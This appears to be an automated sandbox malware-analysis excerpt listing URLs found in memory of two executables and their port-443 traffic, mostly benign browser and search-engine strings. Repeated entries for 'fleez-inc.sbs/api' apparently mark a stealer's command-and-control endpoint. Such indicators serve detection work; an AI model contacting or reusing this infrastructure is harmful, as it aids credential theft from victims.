Source: c3e1e78f6d.exe, 0000000D.00000003.2436187685.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2579390588.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844798958.000000000557E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: c3e1e78f6d.exe, 0000000D.00000003.2436187685.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2579390588.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844798958.000000000557E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: c3e1e78f6d.exe, 0000000D.00000003.2436187685.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2579390588.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844798958.000000000557E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, file.exe, 00000000.00000002.2189859471.000000006C64D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2178846824.000000001D13C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2189602429.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: c3e1e78f6d.exe, 0000000D.00000003.2436187685.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2579390588.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844798958.000000000557E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: c3e1e78f6d.exe, 0000000D.00000003.2436187685.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2579390588.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844798958.000000000557E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: c3e1e78f6d.exe, 0000000D.00000003.2407035686.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406950179.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2407184393.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542575605.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542485401.00000000057FB000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542801002.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808904702.0000000005558000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808590846.000000000556F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2186074735.0000000023162000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2442635266.0000000001566000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2581226163.000000000103B000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2847017068.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2186074735.0000000023162000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2442635266.0000000001566000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2617679754.000000000102E000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2618646977.0000000001038000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: c3e1e78f6d.exe, 0000000D.00000003.2407035686.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406950179.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2407184393.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542575605.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542485401.00000000057FB000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542801002.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808904702.0000000005558000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808590846.000000000556F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: c3e1e78f6d.exe, 0000000D.00000003.2407035686.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406950179.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2407184393.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542575605.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542485401.00000000057FB000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542801002.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808904702.0000000005558000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808590846.000000000556F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: c3e1e78f6d.exe, 0000000D.00000003.2407035686.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406950179.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2407184393.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542575605.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542485401.00000000057FB000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542801002.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808904702.0000000005558000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808590846.000000000556F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2186074735.0000000023162000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2442635266.0000000001566000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2581226163.000000000103B000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2847017068.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2186074735.0000000023162000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2442635266.0000000001566000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2581226163.000000000103B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: c3e1e78f6d.exe, 0000000D.00000003.2407035686.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406950179.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2407184393.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542575605.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542485401.00000000057FB000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542801002.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808904702.0000000005558000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808590846.000000000556F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: c3e1e78f6d.exe, 0000000D.00000003.2407035686.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406950179.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2407184393.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542575605.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542485401.00000000057FB000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542801002.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808904702.0000000005558000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808590846.000000000556F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: c3e1e78f6d.exe, 0000000D.00000003.2407035686.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406950179.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2407184393.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542575605.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542485401.00000000057FB000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542801002.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808904702.0000000005558000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808590846.000000000556F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: c3e1e78f6d.exe, 00000017.00000003.3024056962.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.3021521340.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2845222111.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2825273881.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2825364278.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2902319838.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844405676.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2889037273.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2889401685.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/
Source: c3e1e78f6d.exe, 00000017.00000003.3023444353.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.3024056962.0000000000E77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/1
Source: c3e1e78f6d.exe, 00000017.00000003.2845222111.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844405676.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2889037273.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2889401685.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/6
Source: c3e1e78f6d.exe, 00000017.00000003.2789320451.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/8-
Source: c3e1e78f6d.exe, 0000000D.00000002.2621813218.000000000152A000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2604516981.0000000001527000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/8d
Source: c3e1e78f6d.exe, 00000017.00000003.2902319838.0000000000E77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/:
Source: c3e1e78f6d.exe, 00000011.00000002.2742683237.0000000000F8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/EM
Source: c3e1e78f6d.exe, 00000011.00000003.2579245293.0000000001044000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/K
Source: c3e1e78f6d.exe, 0000000D.00000003.2469989479.0000000001538000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2482197215.0000000001538000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/S
Source: c3e1e78f6d.exe, 0000000D.00000002.2621813218.000000000152A000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2604516981.0000000001527000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/V
Source: c3e1e78f6d.exe, 00000017.00000003.3021521340.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2825589487.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2825273881.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/api
Source: c3e1e78f6d.exe, 0000000D.00000003.2496388933.0000000001553000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/apiJrD6
Source: c3e1e78f6d.exe, 00000011.00000002.2742683237.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2729046669.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/apigsa
Source: c3e1e78f6d.exe, 00000017.00000003.2789320451.0000000000E08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/apit
Source: c3e1e78f6d.exe, 0000000D.00000003.2481952263.000000000156D000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2496648993.000000000156D000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000002.2622414625.0000000001568000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2436690811.000000000156E000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2461507876.000000000156A000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2604699653.0000000001567000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2485579404.000000000156D000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2435330093.000000000156E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/ept-Ra
Source: c3e1e78f6d.exe, 00000011.00000003.2541515615.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/gRO
Source: c3e1e78f6d.exe, 00000011.00000003.2632722456.000000000100E000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2638262334.000000000100A000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2638327582.000000000100E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/nRv
Source: c3e1e78f6d.exe, 00000017.00000003.3023444353.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.3024056962.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2902319838.0000000000E77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/o
Source: c3e1e78f6d.exe, 00000017.00000003.2789320451.0000000000E08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs/w
Source: c3e1e78f6d.exe, 0000000D.00000003.2494815905.0000000001559000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2496388933.0000000001559000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2496752556.0000000001559000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2789320451.0000000000E08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs:443/api
Source: c3e1e78f6d.exe, 00000011.00000003.2728217584.0000000001001000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000002.2742683237.0000000001003000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fleez-inc.sbs:443/apiR
Source: c3e1e78f6d.exe, 00000017.00000003.2847017068.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: c3e1e78f6d.exe, 0000000D.00000003.2406071640.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2541946634.0000000005810000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808081609.000000000559E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: c3e1e78f6d.exe, 00000017.00000003.2846114572.0000000005663000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: c3e1e78f6d.exe, 00000017.00000003.2846114572.0000000005663000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2075191606.00000000233A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000003.1995137985.000000001D03E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2160637336.00000000007D4000.00000040.00000001.01000000.00000003.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406192749.0000000005C77000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406071640.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2541946634.000000000580E000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808081609.000000000559C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: c3e1e78f6d.exe, 0000000D.00000003.2406192749.0000000005C52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000003.1995137985.000000001D03E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2160637336.00000000007D4000.00000040.00000001.01000000.00000003.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406192749.0000000005C77000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406071640.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2541946634.000000000580E000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808081609.000000000559C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: c3e1e78f6d.exe, 0000000D.00000003.2406192749.0000000005C52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: file.exe, 00000000.00000002.2160637336.00000000007D4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2186074735.0000000023162000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2442635266.0000000001566000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2617679754.000000000102E000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2618646977.0000000001038000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: c3e1e78f6d.exe, 0000000D.00000003.2407035686.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406950179.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2407184393.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542575605.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542485401.00000000057FB000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542801002.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808904702.0000000005558000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808590846.000000000556F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2186074735.0000000023162000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2442635266.0000000001566000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2581226163.000000000103B000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2847017068.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: c3e1e78f6d.exe, 0000000D.00000003.2407035686.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406950179.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2407184393.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542575605.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542485401.00000000057FB000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542801002.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808904702.0000000005558000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808590846.000000000556F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.2160637336.00000000008B7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: c3e1e78f6d.exe, 00000017.00000003.2846114572.0000000005663000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.2160637336.00000000008B7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2160637336.00000000008B7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: c3e1e78f6d.exe, 00000017.00000003.2846114572.0000000005663000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.2160637336.00000000008B7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2075191606.00000000233A2000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2442043226.0000000005D4C000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2580739475.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2846114572.0000000005663000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: c3e1e78f6d.exe, 00000017.00000003.2846114572.0000000005663000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2160637336.00000000008B7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2075191606.00000000233A2000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2442043226.0000000005D4C000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2580739475.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2846114572.0000000005663000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2160637336.00000000008B7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
